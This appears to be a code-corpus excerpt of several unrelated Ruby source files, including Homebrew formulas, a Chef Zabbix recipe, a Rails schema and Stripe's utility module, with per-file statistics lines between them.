::File.open(filename, FILE_READ_MODE) {|file| self.convert file, options }
end
# Alias render_file to convert_file to maintain backwards compatibility
alias render_file convert_file
# Internal: Automatically load the Asciidoctor::Extensions module.
#
# Requires the Asciidoctor::Extensions module if the name is :Extensions.
# Otherwise, delegates to the super method.
#
# This method provides the same functionality as using autoload on
# Asciidoctor::Extensions, except that the constant isn't recognized as
# defined prior to it being loaded.
#
# Returns the resolved constant, if resolved, otherwise nothing.
def const_missing name
if name == :Extensions
require_relative 'asciidoctor/extensions'
Extensions
else
super
end
end unless RUBY_ENGINE == 'opal'
end
unless RUBY_ENGINE == 'opal'
autoload :SyntaxHighlighter, %(#{LIB_DIR}/asciidoctor/syntax_highlighter)
autoload :Timings, %(#{LIB_DIR}/asciidoctor/timings)
end
end
# core extensions
require_relative 'asciidoctor/core_ext'
# modules and helpers
require_relative 'asciidoctor/helpers'
require_relative 'asciidoctor/logging'
require_relative 'asciidoctor/substitutors'
require_relative 'asciidoctor/version'
# abstract classes
require_relative 'asciidoctor/abstract_node'
require_relative 'asciidoctor/abstract_block'
# concrete classes
require_relative 'asciidoctor/attribute_list'
require_relative 'asciidoctor/block'
require_relative 'asciidoctor/callouts'
require_relative 'asciidoctor/converter'
require_relative 'asciidoctor/document'
require_relative 'asciidoctor/inline'
require_relative 'asciidoctor/list'
require_relative 'asciidoctor/parser'
require_relative 'asciidoctor/path_resolver'
require_relative 'asciidoctor/reader'
require_relative 'asciidoctor/section'
require_relative 'asciidoctor/stylesheets'
require_relative 'asciidoctor/table'
require_relative 'asciidoctor/writer'
if RUBY_ENGINE == 'opal'
require_relative 'asciidoctor/syntax_highlighter'
require_relative 'asciidoctor/timings'
# this require is satisfied by the Asciidoctor.js build; it supplies compile and runtime overrides for Asciidoctor.js
require 'asciidoctor/js/postscript'
end
| 34.518148 | 183 | 0.593129 |
62bc348bfb0b769fc9c4869fa47aa23318653311 | 624 | class String
define_method(:anagram) do |word|
    # Normalize both strings: lowercase and strip any non-letter characters.
    sorted_input = self.downcase.delete("^a-z").split('').sort
    sorted_word = word.downcase.delete("^a-z").split('').sort
    reversed_word = word.downcase.delete("^a-z").reverse
    user_input = self.downcase.delete("^a-z")
    if user_input.scan(/[aeiouy]/).count < 1
      # A string with no vowels is not treated as a real word.
      "not a real word"
    elsif (sorted_word & sorted_input).empty?
      # The two strings share no letters at all.
      "antigram!"
    elsif user_input == reversed_word
      # The input reads the same as the other word reversed.
      "palindromes!"
    elsif sorted_input == sorted_word
      # Same letters in the same quantities.
      "anagrams!"
    else
      "not an anagram, palindrome, or antigram"
    end
end
end
end
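
# Usage sketch (illustrative inputs, not from the original source):
#
#   "listen".anagram("silent") # => "anagrams!"
#   "drawer".anagram("reward") # => "palindromes!"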
| 29.714286 | 66 | 0.636218 |
620b1f6dc37111a41d4bc8315d84c9070fc6e689 | 2,120 | #--
# Copyright (c) 2010-2012 Michael Berkovich
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
require 'rails'
require 'pp'
[
".",
"./containers"
].each do |dir|
Dir[File.expand_path("#{File.dirname(__FILE__)}/#{dir}/*.rb")].sort.each do |file|
require(file)
end
end
require File.join(File.dirname(__FILE__), 'extensions/array_extension')
require File.join(File.dirname(__FILE__), 'extensions/action_view_extension')
require File.join(File.dirname(__FILE__), 'extensions/active_record_extension')
require File.join(File.dirname(__FILE__), 'extensions/action_controller_extension')
module WillFilter
class Railtie < ::Rails::Railtie #:nodoc:
initializer 'will_filter' do |app|
ActiveSupport.on_load(:active_record) do
::ActiveRecord::Base.send :include, WillFilter::ActiveRecordExtension
end
ActiveSupport.on_load(:action_view) do
::ActionView::Base.send :include, WillFilter::ActionViewExtension
end
ActiveSupport.on_load(:action_controller) do
include WillFilter::ActionControllerExtension
end
end
end
end | 38.545455 | 86 | 0.748113 |
612c108c5e6c4251d43a8775f9e298d2eb87cd59 | 1,258 | class Automake < Formula
desc "Tool for generating GNU Standards-compliant Makefiles"
homepage "https://www.gnu.org/software/automake/"
url "http://ftpmirror.gnu.org/automake/automake-1.15.tar.xz"
mirror "https://ftp.gnu.org/gnu/automake/automake-1.15.tar.xz"
sha256 "9908c75aabd49d13661d6dcb1bc382252d22cc77bf733a2d55e87f2aa2db8636"
bottle do
cellar :any
revision 2
sha256 "70a763221d2bb9baaf630f2170224c915ca96a9966fbb1d86781c8743740bb7b" => :el_capitan
sha256 "d8e4773130e25ff576a0c7d18b4d010b1e03eba90b0074e1ac749fdf3bc13e26" => :yosemite
sha256 "69c1635672fa682a40949572e64fe3495055e97ad2c105dd46fb2e447d0d65a8" => :mavericks
sha256 "6e6fdaa7fb7ddaaeb103341d1ca351e0669874f86eb21eb6623cb345dd1f5b6f" => :mountain_lion
end
depends_on "autoconf" => :run
keg_only :provided_until_xcode43
def install
ENV["PERL"] = "/usr/bin/perl" if OS.mac?
system "./configure", "--prefix=#{prefix}"
system "make", "install"
# Our aclocal must go first. See:
# https://github.com/Homebrew/homebrew/issues/10618
(share/"aclocal/dirlist").write <<-EOS.undent
#{HOMEBREW_PREFIX}/share/aclocal
/usr/share/aclocal
EOS
end
test do
system "#{bin}/automake", "--version"
end
end
| 32.25641 | 95 | 0.740859 |
617d731b24746f7c6c9db5b20f2dc0c91fb2a95c | 1,438 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Monitor::Mgmt::V2019_03_01
module Models
#
# Represents a baseline metadata value.
#
class BaselineMetadata
include MsRestAzure
# @return [String] Name of the baseline metadata.
attr_accessor :name
# @return [String] Value of the baseline metadata.
attr_accessor :value
#
# Mapper for BaselineMetadata class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'BaselineMetadata',
type: {
name: 'Composite',
class_name: 'BaselineMetadata',
model_properties: {
name: {
client_side_validation: true,
required: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
value: {
client_side_validation: true,
required: true,
serialized_name: 'value',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 24.793103 | 70 | 0.515994 |
792ab44f43ef4d2dcd06f0fe9ad8ded03e0b6f6d | 2,867 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20180825151357) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
enable_extension "postgis"
create_table "about", force: true do |t|
t.string "intro"
t.text "description"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "active_admin_comments", force: true do |t|
t.string "namespace"
t.text "body"
t.string "resource_id", null: false
t.string "resource_type", null: false
t.integer "author_id"
t.string "author_type"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "active_admin_comments", ["author_type", "author_id"], :name => "index_active_admin_comments_on_author_type_and_author_id"
add_index "active_admin_comments", ["namespace"], :name => "index_active_admin_comments_on_namespace"
add_index "active_admin_comments", ["resource_type", "resource_id"], :name => "index_active_admin_comments_on_resource_type_and_resource_id"
create_table "admin_users", force: true do |t|
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0, null: false
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.string "current_sign_in_ip"
t.string "last_sign_in_ip"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
add_index "admin_users", ["email"], :name => "index_admin_users_on_email", :unique => true
add_index "admin_users", ["reset_password_token"], :name => "index_admin_users_on_reset_password_token", :unique => true
create_table "projects", force: true do |t|
t.string "title"
t.string "subtitle"
t.string "description"
t.string "languages"
t.datetime "created_at"
t.datetime "updated_at"
end
end
| 40.957143 | 142 | 0.709452 |
4a8604aa20aa506ffd9cfcd78a5602b94b2002fb | 7,488 | #
# Cookbook Name:: bcpc
# Recipe:: zabbix-head
#
# Copyright 2013, Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
include_recipe 'bcpc::apache2'
include_recipe 'bcpc::mysql'
include_recipe 'bcpc::zabbix-repo'
#
# These data bags and vault items are pre-populated at compile time by
# the bcpc::mysql_data_bags recipe.
#
root_user = get_config!('mysql-root-user')
root_password = get_config!('password', 'mysql-root', 'os')
zabbix_user = get_config!('mysql-zabbix-user')
zabbix_password = get_config!('password', 'mysql-zabbix', 'os')
bootstrap = get_bootstrap
admins_list = get_head_node_names
admins_list.push(node[:fqdn]) unless admins_list.include?(node[:fqdn])
admins_list.push(bootstrap) unless bootstrap.nil?
zabbix_admin_user = 'Admin'
make_config('zabbix-admin-user', zabbix_admin_user)
zabbix_admin_password =
get_config('password','zabbix-admin','os') || secure_password
chef_vault_secret 'zabbix-admin' do
data_bag 'os'
raw_data({ 'password' => zabbix_admin_password })
admins admins_list.join(',')
search '*:*'
action :nothing
end.run_action(:create_if_missing)
#
# At this point, if we cannot retrieve the pw from the vault, the chef
# run should be aborted.
#
zabbix_admin_password = get_config!('password','zabbix-admin','os')
zabbix_guest_user = 'guest'
make_config('zabbix-guest-user', zabbix_guest_user)
user node[:bcpc][:zabbix][:user] do
shell '/bin/false'
home '/var/log'
gid node[:bcpc][:zabbix][:group]
system true
end
directory '/var/log/zabbix' do
user node[:bcpc][:zabbix][:user]
group node[:bcpc][:zabbix][:group]
mode 0755
end
# Stop the old service if we find the old service definition
service 'zabbix-server' do
action :stop
only_if { File.exist?('/etc/init/zabbix-server.conf') }
end
# Remove the old service definition from the source-based build.
file '/etc/init/zabbix-server.conf' do
action :delete
end
[
'zabbix-server-mysql',
'zabbix-frontend-php'
].each do |package_name|
package package_name do
action :upgrade
end
end
template '/etc/zabbix/zabbix_server.conf' do
source 'zabbix/server.conf.erb'
owner node[:bcpc][:zabbix][:user]
group 'root'
mode 0600
notifies :restart, 'service[zabbix-server]', :delayed
end
mysql_database node[:bcpc][:zabbix_dbname] do
connection mysql_local_connection_info
encoding 'UTF8'
action :create
notifies :run, 'execute[zabbix-create-database]', :immediately
end
[
'%',
'localhost'
].each do |host_name|
mysql_database_user zabbix_user do
connection mysql_local_connection_info
host host_name
password zabbix_password
action :create
end
mysql_database_user zabbix_user do
connection mysql_local_connection_info
database_name node[:bcpc][:zabbix_dbname]
host host_name
privileges ['ALL PRIVILEGES']
action :grant
end
end
execute 'zabbix-create-database' do
command "gunzip -c /usr/share/doc/zabbix-server-mysql/create.sql.gz | mysql -u #{root_user} " \
"--password=#{root_password} " \
"#{node[:bcpc][:zabbix_dbname]}"
sensitive true if respond_to?(:sensitive)
action :nothing
end
mysql_database 'zabbix-set-admin-password' do
connection mysql_local_connection_info
database_name node[:bcpc][:zabbix_dbname]
sql "UPDATE users SET passwd=md5('#{zabbix_admin_password}') " \
"WHERE alias='#{zabbix_admin_user}'"
action :query
end
mysql_database "zabbix-set-guest-password" do
connection mysql_local_connection_info
database_name node[:bcpc][:zabbix_dbname]
sql "UPDATE users SET passwd=md5('') " \
"WHERE alias='#{zabbix_guest_user}'"
action :query
end
[
'tuning.sql',
'leader_election.sql'
].each do |file_name|
install_path = File.join(Chef::Config.file_cache_path, file_name)
resource_name = "zabbix-run-#{file_name.gsub(/\./,'-')}"
template install_path do
source "zabbix/#{file_name}.erb"
variables(
:history_retention =>
node['bcpc']['zabbix']['retention_history'],
:storage_retention =>
node['bcpc']['zabbix']['retention_default']
)
owner 'root'
group 'root'
mode 0644
notifies :run, "execute[#{resource_name}]", :immediately
end
execute resource_name do
command "mysql -u #{root_user} " \
"--password=#{root_password} " \
"#{node[:bcpc][:zabbix_dbname]} " \
"< #{install_path}"
sensitive true if respond_to?(:sensitive)
action :nothing
end
end
ruby_block 'zabbix-elect-leader' do
block do
require 'mysql2'
require 'timeout'
client_options =
mysql_local_connection_info.merge(database: node[:bcpc][:zabbix_dbname])
client =
Mysql2::Client.new(client_options)
results = client.query("CALL elect_leader('#{node[:hostname]}')")
Chef::Log.info('Zabbix leader election results: ' + results.inspect)
end
end
service 'zabbix-server' do
action [:enable, :start]
end
%w{traceroute php5-mysql php5-gd}.each do |pkg|
package pkg do
action :upgrade
end
end
file '/etc/php5/apache2/conf.d/zabbix.ini' do
user 'root'
group 'root'
mode 00644
content <<-EOH
post_max_size = 16M
max_execution_time = 300
max_input_time = 300
date.timezone = America/New_York
EOH
notifies :run, 'ruby_block[run_state_apache2_restart]', :immediate
end
directory '/etc/zabbix/web' do
mode 0555
recursive true
end
template '/etc/zabbix/web/zabbix.conf.php' do
source 'zabbix/zabbix.conf.php.erb'
user node[:bcpc][:zabbix][:user]
group 'www-data'
mode 0640
notifies :run, 'ruby_block[run_state_apache2_restart]', :immediate
end
#
# a2ensite for httpd 2.4 (Ubuntu 14.04) expects the file to end in '.conf'
# a2ensite for httpd 2.2 (Ubuntu 12.04) expects it NOT to end in '.conf'
#
zabbix_web_conf_file =
if Gem::Version.new(node[:lsb][:release]) >= Gem::Version.new('14.04')
'/etc/apache2/sites-available/zabbix-web.conf'
else
'/etc/apache2/sites-available/zabbix-web'
end
template zabbix_web_conf_file do
source 'apache-zabbix-web.conf.erb'
owner 'root'
group 'root'
mode 00644
notifies :run, "ruby_block[run_state_apache2_restart]", :immediate
end
execute 'apache-enable-zabbix-web' do
user 'root'
command 'a2ensite zabbix-web'
not_if 'test -r /etc/apache2/sites-enabled/zabbix-web*'
notifies :run, 'ruby_block[run_state_apache2_restart]', :immediate
end
include_recipe 'bcpc::zabbix-work'
directory '/usr/local/bin/checks' do
action :create
owner node[:bcpc][:zabbix][:user]
group 'root'
mode 00775
end
directory '/usr/local/etc/checks' do
action :create
owner node[:bcpc][:zabbix][:user]
group 'root'
mode 00775
end
cookbook_file '/usr/local/bin/check' do
source 'checks/check'
owner 'root'
mode 0755
end
ruby_block 'run_state_apache2_restart' do
block do
node.run_state['restart_apache2_needed'] = true
end
action :nothing
end
service 'apache2' do
action :restart
only_if { node.run_state['restart_apache2_needed'] == true }
end
| 25.297297 | 97 | 0.713809 |
627f5745eee444ba82481c886b5aa2829a54c893 | 527 | # encoding: UTF-8
# This file contains data derived from the IANA Time Zone Database
# (http://www.iana.org/time-zones).
module TZInfo
module Data
module Definitions
module Indian
module Kerguelen
include TimezoneDefinition
timezone 'Indian/Kerguelen' do |tz|
tz.offset :o0, 0, 0, :'-00'
tz.offset :o1, 18000, 0, :'+05'
tz.transition 1950, 1, :o1, -631152000, 4866565, 2
end
end
end
end
end
end
| 21.958333 | 66 | 0.555977 |
1a237c7f3d36fa0f8aec52e763b0b0c8cce4f210 | 2,038 | class Expect < Formula
desc "Program that can automate interactive applications"
homepage "https://expect.sourceforge.io/"
url "https://downloads.sourceforge.net/project/expect/Expect/5.45.4/expect5.45.4.tar.gz"
sha256 "49a7da83b0bdd9f46d04a04deec19c7767bb9a323e40c4781f89caf760b92c34"
bottle do
rebuild 1
sha256 "668b4fb12eed5bbf783e8b4ec52dad24b88f38af5577ba1e45ed9947e50e50ef" => :mojave
sha256 "a0c6ffe797dc0bbe512b628819acee67a7a9b00573b6433fe0672285d41a9df1" => :high_sierra
sha256 "fc9ad781caaf8d45f47a87d4303645faa2e600852c73fd5432f0be2e588e95f2" => :sierra
sha256 "4fcb163b1b1e7e209b632c43ba03106ca1c4e4d6a745260b813d28a803581e58" => :el_capitan
end
option "with-threads", "Build with multithreading support"
option "with-brewed-tk", "Use Homebrew's Tk (has Cocoa and threads support)"
deprecated_option "enable-threads" => "with-threads"
# Autotools are introduced here to regenerate configure script. Remove
# if the patch has been applied in newer releases.
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "tcl-tk" if build.with? "brewed-tk"
def install
args = %W[
--prefix=#{prefix}
--exec-prefix=#{prefix}
--mandir=#{man}
--enable-shared
--enable-64bit
]
args << "--enable-threads" if build.with? "threads"
if build.with? "brewed-tk"
args << "--with-tcl=#{Formula["tcl-tk"].opt_prefix}/lib"
else
ENV.prepend "CFLAGS", "-I#{MacOS.sdk_path}/System/Library/Frameworks/Tcl.framework/Versions/8.5/Headers/tcl-private"
args << "--with-tcl=#{MacOS.sdk_path}/System/Library/Frameworks/Tcl.framework"
end
# Regenerate configure script. Remove after patch applied in newer
# releases.
system "autoreconf", "--force", "--install", "--verbose"
system "./configure", *args
system "make"
system "make", "install"
lib.install_symlink Dir[lib/"expect*/libexpect*"]
end
test do
system "#{bin}/mkpasswd"
end
end
| 34.542373 | 122 | 0.712954 |
6243bb39120418348bbd9c2d199d18c32a86db28 | 14,066 | # frozen_string_literal: true
require "cgi"
module Stripe
module Util
# Options that a user is allowed to specify.
OPTS_USER_SPECIFIED = Set[
:api_key,
:idempotency_key,
:stripe_account,
:stripe_version
].freeze
# Options that should be copyable from one StripeObject to another
# including options that may be internal.
OPTS_COPYABLE = (
OPTS_USER_SPECIFIED + Set[:api_base]
).freeze
# Options that should be persisted between API requests. This includes
# client, which is an object containing an HTTP client to reuse.
OPTS_PERSISTABLE = (
OPTS_USER_SPECIFIED + Set[:client] - Set[:idempotency_key]
).freeze
def self.objects_to_ids(obj)
case obj
when APIResource
obj.id
when Hash
res = {}
obj.each { |k, v| res[k] = objects_to_ids(v) unless v.nil? }
res
when Array
obj.map { |v| objects_to_ids(v) }
else
obj
end
end
def self.object_classes
@object_classes ||= Stripe::ObjectTypes.object_names_to_classes
end
def self.object_name_matches_class?(object_name, klass)
Util.object_classes[object_name] == klass
end
# Adds a custom method to a resource class. This is used to add support for
# non-CRUDL API requests, e.g. capturing charges. custom_method takes the
# following parameters:
# - name: the name of the custom method to create (as a symbol)
# - http_verb: the HTTP verb for the API request (:get, :post, or :delete)
# - http_path: the path to append to the resource's URL. If not provided,
# the name is used as the path
# - resource: the resource implementation class
# - target: the class that custom static method will be added to
#
# For example, this call:
    #   custom_method :capture, http_verb: :post
# adds a `capture` class method to the resource class that, when called,
# will send a POST request to `/v1/<object_name>/capture`.
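    #
    # A fuller, hypothetical call (the class names are illustrative only):
    #
    #   Util.custom_method Charge, Charge, :capture, :post, nil
    #
    # after which `Charge.capture(id, params, opts)` sends a POST request to
    # `/v1/charges/<id>/capture`.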
def self.custom_method(resource, target, name, http_verb, http_path)
unless %i[get post delete].include?(http_verb)
raise ArgumentError,
"Invalid http_verb value: #{http_verb.inspect}. Should be one " \
"of :get, :post or :delete."
end
unless target.respond_to?(:resource_url)
raise ArgumentError,
"Invalid target value: #{target}. Target class should have a " \
"`resource_url` method."
end
http_path ||= name.to_s
target.define_singleton_method(name) do |id, params = {}, opts = {}|
unless id.is_a?(String)
raise ArgumentError,
"id should be a string representing the ID of an API resource"
end
url = "#{target.resource_url}/"\
"#{CGI.escape(id)}/"\
"#{CGI.escape(http_path)}"
resp, opts = resource.execute_resource_request(
http_verb,
url,
params,
opts
)
Util.convert_to_stripe_object(resp.data, opts)
end
end
# Converts a hash of fields or an array of hashes into a +StripeObject+ or
# array of +StripeObject+s. These new objects will be created as a concrete
# type as dictated by their `object` field (e.g. an `object` value of
# `charge` would create an instance of +Charge+), but if `object` is not
# present or of an unknown type, the newly created instance will fall back
# to being a +StripeObject+.
#
# ==== Attributes
#
# * +data+ - Hash of fields and values to be converted into a StripeObject.
# * +opts+ - Options for +StripeObject+ like an API key that will be reused
# on subsequent API calls.
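    #
    # Example (the hash below is illustrative data, not from the original source):
    #
    #   Util.convert_to_stripe_object({ object: 'charge', id: 'ch_123' })
    #   # => an instance of Stripe::Charge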
def self.convert_to_stripe_object(data, opts = {})
opts = normalize_opts(opts)
case data
when Array
data.map { |i| convert_to_stripe_object(i, opts) }
when Hash
# Try converting to a known object class. If none available, fall back
# to generic StripeObject
object_classes.fetch(data[:object], StripeObject)
.construct_from(data, opts)
else
data
end
end
def self.log_error(message, data = {})
config = data.delete(:config) || Stripe.config
logger = config.logger || Stripe.logger
if !logger.nil? ||
!config.log_level.nil? && config.log_level <= Stripe::LEVEL_ERROR
log_internal(message, data, color: :cyan, level: Stripe::LEVEL_ERROR,
logger: Stripe.logger, out: $stderr)
end
end
def self.log_info(message, data = {})
config = data.delete(:config) || Stripe.config
logger = config.logger || Stripe.logger
if !logger.nil? ||
!config.log_level.nil? && config.log_level <= Stripe::LEVEL_INFO
log_internal(message, data, color: :cyan, level: Stripe::LEVEL_INFO,
logger: Stripe.logger, out: $stdout)
end
end
def self.log_debug(message, data = {})
config = data.delete(:config) || Stripe.config
logger = config.logger || Stripe.logger
if !logger.nil? ||
!config.log_level.nil? && config.log_level <= Stripe::LEVEL_DEBUG
log_internal(message, data, color: :blue, level: Stripe::LEVEL_DEBUG,
logger: Stripe.logger, out: $stdout)
end
end
def self.symbolize_names(object)
case object
when Hash
new_hash = {}
object.each do |key, value|
key = (begin
key.to_sym
rescue StandardError
key
end) || key
new_hash[key] = symbolize_names(value)
end
new_hash
when Array
object.map { |value| symbolize_names(value) }
else
object
end
end
# Encodes a hash of parameters in a way that's suitable for use as query
# parameters in a URI or as form parameters in a request body. This mainly
# involves escaping special characters from parameter keys and values (e.g.
# `&`).
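    #
    # Example (illustrative values):
    #
    #   Util.encode_parameters(a: 1, b: [2, 3])
    #   # => "a=1&b[0]=2&b[1]=3"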
def self.encode_parameters(params)
Util.flatten_params(params)
.map { |k, v| "#{url_encode(k)}=#{url_encode(v)}" }.join("&")
end
# Encodes a string in a way that makes it suitable for use in a set of
# query parameters in a URI or in a set of form parameters in a request
# body.
def self.url_encode(key)
CGI.escape(key.to_s).
# Don't use strict form encoding by changing the square bracket control
# characters back to their literals. This is fine by the server, and
# makes these parameter strings easier to read.
gsub("%5B", "[").gsub("%5D", "]")
end
def self.flatten_params(params, parent_key = nil)
result = []
# do not sort the final output because arrays (and arrays of hashes
# especially) can be order sensitive, but do sort incoming parameters
params.each do |key, value|
calculated_key = parent_key ? "#{parent_key}[#{key}]" : key.to_s
if value.is_a?(Hash)
result += flatten_params(value, calculated_key)
elsif value.is_a?(Array)
result += flatten_params_array(value, calculated_key)
else
result << [calculated_key, value]
end
end
result
end
def self.flatten_params_array(value, calculated_key)
result = []
value.each_with_index do |elem, i|
if elem.is_a?(Hash)
result += flatten_params(elem, "#{calculated_key}[#{i}]")
elsif elem.is_a?(Array)
result += flatten_params_array(elem, calculated_key)
else
result << ["#{calculated_key}[#{i}]", elem]
end
end
result
end
# `Time.now` can be unstable in cases like an administrator manually
    # updating its value or a reconciliation via NTP. For this reason, prefer
# the use of the system's monotonic clock especially where comparing times
# to calculate an elapsed duration.
#
# Shortcut for getting monotonic time, mostly for purposes of line length
# and test stubbing. Returns time in seconds since the event used for
# monotonic reference purposes by the platform (e.g. system boot time).
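    #
    # Typical use (illustrative):
    #
    #   started = Util.monotonic_time
    #   # ... do some work ...
    #   elapsed = Util.monotonic_time - started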
def self.monotonic_time
Process.clock_gettime(Process::CLOCK_MONOTONIC)
end
def self.normalize_id(id)
if id.is_a?(Hash) # overloaded id
params_hash = id.dup
id = params_hash.delete(:id)
else
params_hash = {}
end
[id, params_hash]
end
# The secondary opts argument can either be a string or hash
# Turn this value into an api_key and a set of headers
def self.normalize_opts(opts)
case opts
when String
{ api_key: opts }
when Hash
check_api_key!(opts.fetch(:api_key)) if opts.key?(:api_key)
# Explicitly use dup here instead of clone to avoid preserving freeze
# state on input params.
opts.dup
else
raise TypeError, "normalize_opts expects a string or a hash"
end
end
def self.check_string_argument!(key)
raise TypeError, "argument must be a string" unless key.is_a?(String)
key
end
def self.check_api_key!(key)
raise TypeError, "api_key must be a string" unless key.is_a?(String)
key
end
# Normalizes header keys so that they're all lower case and each
# hyphen-delimited section starts with a single capitalized letter. For
# example, `request-id` becomes `Request-Id`. This is useful for extracting
# certain key values when the user could have set them with a variety of
    # different naming schemes.
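    #
    # Example (illustrative header value):
    #
    #   Util.normalize_headers('request-id' => 'req_123')
    #   # => { 'Request-Id' => 'req_123' }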
def self.normalize_headers(headers)
headers.each_with_object({}) do |(k, v), new_headers|
k = k.to_s.tr("_", "-") if k.is_a?(Symbol)
k = k.split("-").reject(&:empty?).map(&:capitalize).join("-")
new_headers[k] = v
end
end
# Generates a Dashboard link to inspect a request ID based off of a request
# ID value and an API key, which is used to attempt to extract whether the
# environment is livemode or testmode.
def self.request_id_dashboard_url(request_id, api_key)
env = !api_key.nil? && api_key.start_with?("sk_live") ? "live" : "test"
"https://dashboard.stripe.com/#{env}/logs/#{request_id}"
end
# Constant time string comparison to prevent timing attacks
# Code borrowed from ActiveSupport
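    #
    # Example (illustrative strings):
    #
    #   Util.secure_compare('sig_a', 'sig_a') # => true
    #   Util.secure_compare('sig_a', 'sig_b') # => false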
def self.secure_compare(str_a, str_b)
return false unless str_a.bytesize == str_b.bytesize
l = str_a.unpack "C#{str_a.bytesize}"
res = 0
str_b.each_byte { |byte| res |= byte ^ l.shift }
res.zero?
end
#
# private
#
COLOR_CODES = {
black: 0, light_black: 60,
red: 1, light_red: 61,
green: 2, light_green: 62,
yellow: 3, light_yellow: 63,
blue: 4, light_blue: 64,
magenta: 5, light_magenta: 65,
cyan: 6, light_cyan: 66,
white: 7, light_white: 67,
default: 9,
}.freeze
private_constant :COLOR_CODES
# Uses an ANSI escape code to colorize text if it's going to be sent to a
# TTY.
def self.colorize(val, color, isatty)
return val unless isatty
mode = 0 # default
foreground = 30 + COLOR_CODES.fetch(color)
background = 40 + COLOR_CODES.fetch(:default)
"\033[#{mode};#{foreground};#{background}m#{val}\033[0m"
end
private_class_method :colorize
# Turns an integer log level into a printable name.
def self.level_name(level)
case level
when LEVEL_DEBUG then "debug"
when LEVEL_ERROR then "error"
when LEVEL_INFO then "info"
else level
end
end
private_class_method :level_name
def self.log_internal(message, data = {}, color:, level:, logger:, out:)
data_str = data.reject { |_k, v| v.nil? }
.map do |(k, v)|
format("%<key>s=%<value>s",
key: colorize(k, color, logger.nil? && !out.nil? && out.isatty),
value: wrap_logfmt_value(v))
end.join(" ")
if !logger.nil?
# the library's log levels are mapped to the same values as the
# standard library's logger
logger.log(level,
format("message=%<message>s %<data_str>s",
message: wrap_logfmt_value(message),
data_str: data_str))
elsif out.isatty
out.puts format("%<level>s %<message>s %<data_str>s",
level: colorize(level_name(level)[0, 4].upcase,
color, out.isatty),
message: message,
data_str: data_str)
else
out.puts format("message=%<message>s level=%<level>s %<data_str>s",
message: wrap_logfmt_value(message),
level: level_name(level),
data_str: data_str)
end
end
private_class_method :log_internal
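# Illustrative example of the plain output format (no logger, non-TTY `out`);
# the message and data values below are made up:
#
#   log_internal("request", { path: "/v1/charges" },
#                color: :cyan, level: LEVEL_INFO, logger: nil, out: $stderr)
#   # prints: message=request level=info path=/v1/charges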
# Wraps a value in double quotes if it looks sufficiently complex so that
# it can be read by logfmt parsers.
def self.wrap_logfmt_value(val)
# If value is any kind of number, just allow it to be formatted directly
# to a string (this will handle integers or floats).
return val if val.is_a?(Numeric)
# Hopefully val is a string, but protect in case it's not.
val = val.to_s
if %r{[^\w\-/]} =~ val
# If the string contains any special characters, escape any double
# quotes it has, remove newlines, and wrap the whole thing in quotes.
format(%("%<value>s"), value: val.gsub('"', '\"').delete("\n"))
else
# Otherwise use the basic value if it looks like a standard set of
# characters (and allow a few special characters like hyphens, and
# slashes)
val
end
end
private_class_method :wrap_logfmt_value
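# Illustrative examples:
#
#   wrap_logfmt_value(200)          # => 200 (numbers pass through unquoted)
#   wrap_logfmt_value("GET")        # => "GET" (simple values left bare)
#   wrap_logfmt_value("two words")  # => "\"two words\"" (quoted for logfmt parsers)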
end
end
| 34.560197 | 79 | 0.61247 |
189ae0511ba9189aa0fbdbcfc817482432c36b84 | 70 | # Add your variables here
first_number = "luis"
second_number = "soto" | 23.333333 | 25 | 0.757143 |
03e7342fcc322bfea19c445c8da17f1cfda684e8 | 1,469 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'trelloist/version'
Gem::Specification.new do |spec|
spec.name = "trelloist"
spec.version = Trelloist::VERSION
spec.authors = ["Tumas Bajoras"]
spec.email = ["[email protected]"]
spec.summary = %q{Create trello checklists from CLI}
spec.homepage = "https://github.com/Tumas/trelloist"
spec.license = "MIT"
